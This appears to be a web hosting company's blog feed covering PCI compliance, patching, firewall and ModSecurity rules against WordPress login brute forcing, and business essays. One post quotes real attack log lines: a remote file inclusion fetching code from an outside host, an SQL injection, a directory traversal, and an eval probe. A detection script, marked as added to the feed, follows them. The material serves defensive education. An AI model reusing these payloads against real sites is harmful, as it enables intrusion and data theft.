Managed Hosting | DynamicNet, Inc. https://dni.hosting - PCI Compliant, Secure, and Performance Optimized WordPress Hosting

TLSv1.0 and PCI Compliance. https://dni.hosting/tlsv1-0-and-pci-compliance/ Thu, 14 May 2015 05:07:56 +0000 http://www.dynamicnet.net/?p=4802 PCI DSS compliance states that by June 2016 TLSv1.0 must be disabled. The downside is that any browser IE10 and prior will not be able to connect to your website. Those clients will need to upgrade their browser, use a different browser, or get with their browser vendor for a fix to use TLS 1.1 or higher. We had to upgrade our servers now, as PCI scanning vendors have started failing PCI compliance scans early for having TLSv1.0 enabled.

All our forward-facing servers were patched and TLS 1.0 disabled as per the PCI compliance guidelines.

As always, you can put your trust in DNI to provide you with a fast response to your PCI compliance issues.

Glibc Ghost Vulnerability https://dni.hosting/glibc-ghost-vulnerability/ Wed, 28 Jan 2015 05:10:46 +0000 http://www.dynamicnet.net/?p=4794 On 1/27/2015 we were notified by our software vendors of a critical flaw in the Linux glibc library, CVE-2015-0235, affecting all CentOS, Red Hat and CloudLinux servers.

After our vendors released OS patches, we patched all servers immediately. This includes all clients on our bi-monthly patching service.

What is glibc?

The glibc library (the GNU C Library) is a core part of the Linux operating system; it implements the standard C library that nearly every program on the system links against. It is a critical library, and without it Linux will not function.

If you would like to learn about the details of this vulnerability, please visit https://community.qualys.com/blogs

WordPress wp-login.php brute force attacks. https://dni.hosting/wordpress-wp-login-php-brute-force-attacks/ Fri, 12 Apr 2013 15:32:58 +0000 http://www.dynamicnet.net/?p=4731 WordPress brute force attacks have started crippling servers all over the internet. Our CloudLinux servers have managed to stay up, with higher than normal CPU and RAM usage. Other servers without CloudLinux haven’t fared so well. We started investigating these attacks on April 9th 2013 and captured packets immediately to get the payload of these brute force attacks. We implemented modsecurity2 rules that slowed the brute force attacks until they changed on April 12th 2013. After this change, no single IP would try more than once before the attack switched to another IP, so per-IP counting alone no longer stops it. Stopping this attack is near impossible unless there is a unique payload string in the requests to match on. One was finally found and the matching rule implemented cluster wide. Below are the rules we have in place to limit the attack. Even if you are not getting hit, we would recommend implementing these in some form.

On CSF and APF firewalls, add the following to /etc/csf/csfpre.sh or /etc/apf/preroute.rules:

#Attack on wordpress: drop packets carrying the login form payload string
/sbin/iptables -I INPUT -p tcp --dport 80 -m string --string "Log+In&testcookie=1" --algo kmp -j DROP

Add this to your modsecurity2 rules:

<LocationMatch "/wp-login.php">
SecAction "initcol:ip=%{REMOTE_ADDR},pass,nolog,id:313371"
SecAction "phase:5,deprecatevar:ip.counter=2/30,pass,nolog,id:313372"
SecRule IP:COUNTER "@gt 1" "phase:2,pause:300,deny,status:406,setenv:RATELIMITED,skip:1,nolog,id:313373"
SecAction "phase:2,pass,setvar:ip.counter=+1,nolog,id:313374"
</LocationMatch>

And if all else fails, you can block all access to wp-login.php in the main Apache config (this is Apache 2.2 syntax; Apache 2.4 uses "Require all denied" in place of the Order/Deny directives):

<Files wp-login.php>
order deny,allow
Deny from all
</Files>

For clients wanting to secure their own WordPress login, edit the .htaccess in your FTP folder and add the below, with the IP address(es) that need to connect to your WordPress login in place of xxx.xxx.xxx.xxx:

<Files wp-login.php>
deny from all
allow from xxx.xxx.xxx.xxx
</Files>

Or chmod 000 all wp-login.php files. Note this command is for H-Sphere clusters; change the path to where your web files are located:

find /hsphere/local/home -type f -name 'wp-login.php' -print0 | xargs -0 chmod 000

If you have any further questions, please don’t hesitate to contact us.

It is Personal, It’s Business https://dni.hosting/personal-business/ Mon, 24 Dec 2012 14:00:13 +0000 http://www.dynamicnet.net/?p=4704 In the 1972 movie, The Godfather, we hear Tom stating, “This is business, not personal!”

I lost track of how many times I’ve heard that phrase or variations like it to justify business decisions whether it be employer vs. employee or business vs. customer.

If your focus is building and maintaining relationships, the “vs” should always be a red flag. If your focus is on the dollar, then you might miss the “vs.” part of the equation.

How many of you have heard the phrase, penny wise and dollar foolish?

May I propose to you that if you believe “This is business, not personal” when it comes to any relationship, you are losing more dollars than if you treat every issue as being very personal?

How much longer do relationships survive if you treat each one with loving care? Each decision and action is personal to the recipient, and their feelings always matter.

What’s the lifetime value of your customers? Do you want that lifeblood to be extended for as long as possible? Then consider making it very personal in the right ways.

What are your thoughts? Please share them in the comment area below.

Service Suspension https://dni.hosting/service-suspension/ Mon, 10 Dec 2012 14:00:53 +0000 http://www.dynamicnet.net/?p=4225 Have you ever taken a sales call where you absolutely knew you could solve the prospective customer’s pain for a reasonable investment (one that in the long run would actually save them money), only to have their jaw drop to the floor as they complain your solution(s) are too expensive?

The next time I get a phone call to go over hacker clean up, server hardening, or server administration where the prospective customer is more concerned over the $100.00 per hour rate than the problem costing them customers and potentially their business, I hope I remember to share this article with them.

Imagine reading Service Suspension – Ongoing unanswered abuse complaints and thinking to yourself, the person is in a jam… I hope they get someone who can really help them (maybe we could, not sure), then later on reading that the person who initiated the post also runs an “All you can Eat” (i.e. unlimited support tickets, unlimited labor time) server administration business where they advertise a long list of what they can do for you for just $15.00 per month. I guess they are so packed with work they could not solve their own problems.

Imagine, for just $15.00 per month you get “24/7/365 USA-Based Technical Support” plus “24/7/365 Server Monitoring (5 Minute Intervals)” of your servers plus “Guaranteed 15 Minute Response On Monitoring Alerts” and so much more… sounds like a great deal? Right?

Now, I’m sure if you did a study of people who have heard and even believe in the quote, “you get what you pay for,” or variations of it, the percentage would be high.

Yet, how many actually do their homework to determine if something is really too good to be true?

For example, would you know right away that $15.00 per month for 24×7 coverage 365 days per year with a guaranteed response time of 15-minutes and unlimited administrator work (i.e. unlimited hours of work per month) was a deal too good to be true?

What if they removed the word, “unlimited,” and only included one hour per month? Would it then be more realistic?

In order to answer that question, what’s the going hourly rate for a server administrator? For a security administrator?

In the United States, for a server administrator, the going hourly rate ranges from $30.00 per hour to $52.00 per hour; for security administrators, the hourly rate ranges from $38.00 per hour to $56.00 per hour. In both cases, that doesn’t include benefits.

If a company is saying you get just even one hour for $15.00 when the going rate for an experienced party is $30.00 to $38.00 at a minimum….. get the picture?

You might get marketing speak that the employees multi-task and can work on many tasks at the same time… but isn’t that like someone who worked 2,000 real hours putting down 6,000 billable hours?

What are your thoughts on this subject? Did you purchase time thinking the rate was good or even average only to find out you were taken in by a “too good to be true” event? Let us know your thoughts below.

CloudLinux and Reliable Hosting https://dni.hosting/cloudlinux-reliable-hosting/ Mon, 26 Nov 2012 14:00:35 +0000 http://www.dynamicnet.net/?p=4369 CloudLinux is an operating system based on CentOS and OpenVZ that brings a more secure, out of the box, operating system which allows a shared hosting environment to mimic a VPS-like environment for each hosting customer.

If you could imagine a refrigerator whose contents were a complete mess, or even a room that was an organizational disaster, then open the door, throw in a magic ball of yarn, close the door, and open the door again… only to be amazed at how well everything is organized and clutter free, you would get a visual of what CloudLinux allows you to do at the server level.

If you’ve read previous articles I’ve written, you may get the hint I like dancing, and dancing like concepts such as when I wrote a two part series dealing with The Security Dance (part 1), and Taking Charge of the Security Dance (part 2).

CloudLinux is the same: you have two primary dance partners — visitors to Web sites hosted on servers running CloudLinux, and the hosting provider making use of CloudLinux.

Hosting providers who set up and use CloudLinux, when push comes to shove, have two choices for how they will use CloudLinux as part of their hosting infrastructure:

  1. As a means to provide an extremely stable and reliable environment where CloudLinux will only trigger if there is outright malicious abuse.
  2. As a means to cram as many web sites onto the server to achieve what is called in the industry, site / server density, as possible. In this area, CloudLinux can increase the capacity of a server anywhere from two to ten fold.

The visitor perspective on these two choices comes down to what I’ll refer to as “light handed throttling”, where the touch is so light that real visitors with zero malicious intent will not know the server is being monitored in real time; and “heavy handed throttling”, where visitors may see growing delays in browsing through pages, be told the site is under maintenance (when it is not), or get a variety of errors ranging from time outs to 403 and 500 server errors.

I’ve written about the impact of heavy handed throttling in an article titled, Does cheap web hosting lead to lost revenue?

Yet, just as CloudLinux can be used by cheap hosting providers to focus on continuing to be cheap, CloudLinux can also be used by value hosting providers to increase the stability of their environment.

Picture a small business steward who wants to learn rock climbing in an area known for dangerous birds that swoop in and can startle a new climber, causing them to fall. Now imagine an environment with the same ambiance and yet no worries, as such malicious activity is kept at bay.

That’s the focus we take with utilizing CloudLinux on our fully managed shared hosting servers. Light handed throttling that valid visitors never see, feel, or sense; and only coming out when a malicious bird would want to swoop in to cause someone to fall or stumble.

As a visitor to Web sites which would you prefer? The hosting provider who is using heavy handed throttling so they can cram as many sites onto a server as possible so they can justify very low prices? Or the high value provider who always wants the visitor to have a fast, reliable experience? Let us know in the comments below.

Please contact us if you have an interest in either using CloudLinux on servers you host through SoftLayer or other data centers, or about becoming one of our satisfied small to medium business customers.

How often should I log into WordPress https://dni.hosting/log-wordpress/ Mon, 19 Nov 2012 14:00:29 +0000 http://www.dynamicnet.net/?p=3858

Over the past several years of working with small business owners and WordPress, we are often asked, “How often should I log into WordPress?” or related statements that beg the question.

I.e. If I’m not blogging or otherwise updating content, why would I have to log into WordPress on any regular basis?

Let me share with you some reasons as to why you should be logging into your WordPress content management system — CMS — or blog as often during the week as you are able to practically do so.

  1. First and foremost, if you use a backup plugin, is it working? How would you know?
  2. Secondly, are there any updates available for your plugins, themes, or WordPress itself?
  3. Are there any other notifications for which you need to take some action?

For backup, I strongly recommend BackWPUp. It connects with the Dashboard so that when you login, you can see a recent list of successful as well as any unsuccessful backups.

If you have backup covered, in my experience you still want to check on a regular basis for updates.

Now, if you have WordFence or a similar plugin installed, you will get email notifications of updates. Outside of such notifications, logging into WordPress will allow you to see if there are updates available.

If there are updates available, I do encourage you to read the change log first prior to applying the update; and, to backup (including the database) prior to any update.

Here’s why. We use Relevanssi as a replacement for the WordPress search function; it had a recent update. If I had just upgraded, I would have missed the important instructions in the change log telling me to deactivate and then reactivate the plugin after the update, to apply important WordPress database changes the plugin needed to make.

The bottom line is you should have it on your calendar, recurring at least once a week, to log into WordPress as an administrative user.

What are your thoughts for how often the steward / manager of a WordPress site should log in as an administrative user?

Comment and let us know.

Lessons learned from an Internet outage https://dni.hosting/lessons-learned-internet-outage/ Mon, 12 Nov 2012 14:00:12 +0000 http://www.dynamicnet.net/?p=4302 We currently co-locate a small number of servers for off site backup as well as anti-spam appliances; this is part of our Think Local initiative.

Just after the ceremony of our daughter’s graduation from culinary school, I was paged with the message that Internet connectivity was down to the facility.

I was able to verify the loss of Internet connectivity as we drove home; and then it became the dance between getting updates from the co-location facility in Lancaster, PA and providing updates to our customers.

This was the very first major outage the co-location facility has had in years; and the very first outage that we have experienced since becoming their customer a little over two years ago.

The outage started shortly after 5:00 PM Eastern Time, and as it started to head past 11:00 PM, we were faced with the following issues:

  1. Off site backups would fail (as the backup server in Lancaster, PA could not reach out to the servers for which backup is scheduled).
  2. Email to our customers that go through the anti-spam appliance would bounce.

Thank Jesus, we did have a Plan B for the mail appliance.

We would redirect the MX (mail exchange) record to point directly to our mail servers rather than the anti-spam appliance. While there would be an increase in spam delivered, at least mail delivery would have minimal impact.

While we did wait as long as possible to see if we had to implement Plan B, we ended up doing so shortly before 3 AM Eastern Time.

Thankfully, connectivity with the local co-location facility was restored around noon time the next day; and we were able to shift gears back to the anti-spam appliance… and we only lost one day of not backing up.

While we had Plan B planned out, we got to experience the hiccups (oh, we forgot about customer abc that routes to a different mail server); and we updated our documentation in case Plan B is ever needed again.

The moral of this story raises the question… what’s your plan B for when there’s no Internet when you need it?

Please share yours in the comment section below.

Hacker Attack Vectors https://dni.hosting/hacker-attack-vectors/ Mon, 29 Oct 2012 13:00:26 +0000 http://www.dynamicnet.net/?p=4443

Repeat after me, “hackers most often target vulnerabilities, not specific people or companies.” Now, say that over and over again, and shortly you should come to the conclusion that every single device and application typically has vulnerabilities, which makes everyone a target.

That’s right, everyone is a potential target — not just the big names, not just the rich companies, etc.

Now, web-based hack attempts come in many forms ranging from brute force to SQL injections.

Here’s a list of the common types: remote file inclusion, SQL injection, directory traversal, local file inclusion, and brute force.

I would like to share with you what each of the above types looks like from a log file or security report perspective.

The following comes from our proactive security monitoring service as well as the reports we receive from our global security service.

I’m going to start off with the most common type we see which is remote file inclusion:

184.107.145.18 - - [06/Sep/2012:01:13:27 -0400] "GET /packages//wp-content/themes/metamorphosis/functions/thumb.php?src=http://www.blogger.com.moulinsaeau-41.org/cache.php HTTP/1.1" 404 3612 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)

The above is a TimThumb attack where the attacker believes the Metamorphosis theme for WordPress is vulnerable; they are trying to include the code from http://www.blogger.com.moulinsaeau-41.org/cache.php through the potential vulnerability.

The next type is an SQL injection attack:

84.235.73.226 - - [09/Sep/2012:01:16:03 +0100] "GET /merchandise.php?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(table_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x6A6F686E73746F6E5F6965%20limit%200,1),2,3,4,5-- HTTP/1.1" 500 3506 "-" "-" UEvfw1Qz7pgAAGfUdE0 "-"

The next is a directory traversal attack:

195.157.13.221 - - [05/Sep/2012:21:28:20 +0100] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 500 3506 "-" "-" UEe15FQz7pAAABD2KuM "-"

What follows is an example of a local file inclusion:

190.90.209.251 - - [05/Sep/2012:18:13:46 +0100] "GET /phpMyAdmin//config/config.inc.php?eval=echo%20md5(123); HTTP/1.1" 500 3506 "-" "-" UEeISlWFNc8AABl2Nvw "-"

Below are two examples of brute force — one for SSH, the other for email:

sshd[21192]: Invalid user deploy from 64.185.229.239
vpopmail[7134]: vchkpw-pop3: vpopmail user not found webmaster@:88.43.116.246
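As an added example (not code from the original posts), the script below triages Apache combined log lines the way the entries above are read: it classifies a request under the vector it resembles (remote file inclusion, SQL injection, directory traversal, and the eval= probe this post files under local file inclusion), and it flags the two wp-login.php brute force shapes described in the earlier wp-login.php post, a single IP retrying and the April 12th pattern of many IPs trying once each. The sample log lines are constructed (documentation IP ranges, made-up hosts), and the patterns are deliberately narrow illustrations rather than a production ruleset.

```python
import re
from collections import Counter
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache "combined" log format, the layout of the entries quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One deliberately narrow pattern per vector named in the post, checked in
# order; a request is reported under the first vector that matches.
VECTOR_RULES = [
    ("remote file inclusion", re.compile(r'[?&]\w+=(https?|ftp)://', re.I)),
    ("sql injection", re.compile(r'\bunion\s+(all\s+)?select\b|information_schema', re.I)),
    ("directory traversal", re.compile(r'\.\./|\x00')),
    # the post files the "?eval=" probe under local file inclusion; kept that way here
    ("local file inclusion", re.compile(r'[?&](eval|file|include)=', re.I)),
]


def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def classify_request(target):
    """Name the attack vector a request target resembles, or None for benign traffic."""
    decoded = unquote(target)  # %20, %00 and friends are decoded before matching
    for label, rule in VECTOR_RULES:
        if rule.search(decoded):
            return label
    return None


def wp_login_brute_force(entries, window=timedelta(minutes=5), per_ip=5, distinct_ips=10):
    """Flag one IP hammering wp-login.php (what a per-IP counter such as the
    ModSecurity rule catches) and the distributed form, one POST per IP, which
    only shows up as many distinct IPs hitting the login inside a short window."""
    events = sorted(
        (e["time"], e["ip"]) for e in entries
        if e["method"] == "POST" and e["target"].split("?")[0].endswith("/wp-login.php")
    )
    noisy = {ip for ip, n in Counter(ip for _, ip in events).items() if n >= per_ip}
    distributed = False
    for i, (t, _) in enumerate(events):
        j = i
        while j > 0 and events[j - 1][0] >= t - window:  # look back over the window
            j -= 1
        if len({ip for _, ip in events[j:i + 1]}) >= distinct_ips:
            distributed = True
            break
    return {"attempts": len(events), "noisy_ips": sorted(noisy), "distributed": distributed}


# Constructed sample lines modelled on the post's entries (documentation IPs, made-up hosts).
SAMPLE_LOG = [
    '203.0.113.10 - - [06/Sep/2012:01:13:27 -0400] "GET /wp-content/themes/x/thumb.php?src=http://evil.example/c.php HTTP/1.1" 404 3612 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [09/Sep/2012:01:16:03 +0100] "GET /merchandise.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3-- HTTP/1.1" 500 3506 "-" "-"',
    '203.0.113.12 - - [05/Sep/2012:21:28:20 +0100] "GET /crm/sort.php?module_name=../../../../etc/passwd%00 HTTP/1.1" 500 3506 "-" "-"',
    '203.0.113.13 - - [05/Sep/2012:18:13:46 +0100] "GET /phpMyAdmin/config/config.inc.php?eval=echo%20md5(123); HTTP/1.1" 500 3506 "-" "-"',
    '192.0.2.50 - - [12/Apr/2013:09:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
] + [  # the April 12th pattern: many IPs, one login attempt each, seconds apart
    f'198.51.100.{n} - - [12/Apr/2013:10:00:{n:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 4000 "-" "Mozilla/4.0"'
    for n in range(1, 13)
] + [  # the earlier pattern: a single IP retrying
    f'192.0.2.7 - - [12/Apr/2013:11:00:{n:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 4000 "-" "curl/7.0"'
    for n in range(5)
]
```

Feed parse_line the lines of a real access log, then pass the parsed entries to classify_request and wp_login_brute_force; SAMPLE_LOG exercises all four web vectors plus both brute force shapes.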

Do you review your hosting log files on a regular basis to see what attacks are getting through or being blocked?

Is your provider doing this for you?

Please let us know your questions and thoughts in the comments below.

Customer Service 101 Relationships > Being Correct https://dni.hosting/customer-service-101-relationships/ Mon, 22 Oct 2012 13:00:45 +0000 http://www.dynamicnet.net/?p=4588 Most small business stewards provide customer service as well as receive customer service as part of wearing many hats.

I really appreciate being on both ends of giving and receiving as each encounter is an opportunity to learn, to adapt, to change, and to improve.

Part of that picture is hearing and seeing something you know makes sense and is true, and then growing into it (i.e. I know, I know… but don’t do… then ah ha… put it in action, silly).

One of the customer service 101 lessons involves being technically correct, but presenting the situation in a way that devalues the relationship.

In every relationship, you have choices. You can choose to always be right (i.e. technically correct), or you can choose to be in a relationship. If you value long term relationships like I do, you will do your best to focus on the relationship rather than who is right and how often.

Every encounter you have with your customers, your employees, your partners is an opportunity for you to establish (or re-establish) relationship values or diminish them. The more they are diminished, the more likely the relationship will end.

Let me give you two examples. First is on the giving end, the second on the receiving end.

A customer puts in a support ticket about SpamAssassin incorrectly tagging valid email as suspected spam. In the email, the customer also complains about higher than normal real spam getting through.

A technically correct response might go into explaining SpamAssassin’s scoring mechanism, whitelisting and how whitelisting only lowers the chance of tagging, etc., as well as just telling the customer to forward the actual spam that got through to the anti-spam appliance engineers.

A customer relationship response is to call the customer on the phone to go over the SpamAssassin settings, ask if it is ok to outright disable SpamAssassin (it duplicates the anti-spam appliance, and in this particular case was only tagging incorrectly), go over the differences between the anti-spam appliance and SpamAssassin and the benefit of training the system, and empathize with the customer about the spam that does get through by both disliking spam and sharing that no system is perfect, including our own anti-spam system.

The phone call also allowed a check in on an upcoming trip the client is looking forward to taking along with making sure the customer understands how much they are valued as a customer.

On the receiving end, I tend to perform backups more than the average person, knowing the value of having a recent backup over an old backup or no backup at all. Some of the backups I take cover plan B and plan C for data recovery (do you have multiple plans for recovery in case your primary plan doesn’t work as intended?).

One of the backup methods started failing, and I opened a ticket with the data center whose private network I was using to do the backup to see if they could help.

All of the initial responses were technically correct. Yet, all of them ended with: if you don’t respond within four days, the ticket will close. The problem still existed. I persisted and literally asked for a hero to step up to the plate (I’m sharing this because my personal feeling is that not all customers will be patient and ask for a hero when there appears to be no hero; they may just move on). The partner did step it up several notches, and moved from being technically correct to providing in depth responses, viable alternatives and a phone call.

They were also open to passing along to the entire team about the differences between being right (technically correct) and being right plus promoting the relationship.

Please consider the following thoughts:

  • You are in various relationships between family, friends, work, et al.
  • Those relationships do matter.
  • Does it matter who is right how often or does it matter more to have a long lasting relationship?
  • As you respond to parties in your relationship is your focus about keeping and improving the relationship because the other party matters?
  • What can you do daily to step up to the plate and be a hero?

What are your thoughts? Please share in the comments below.
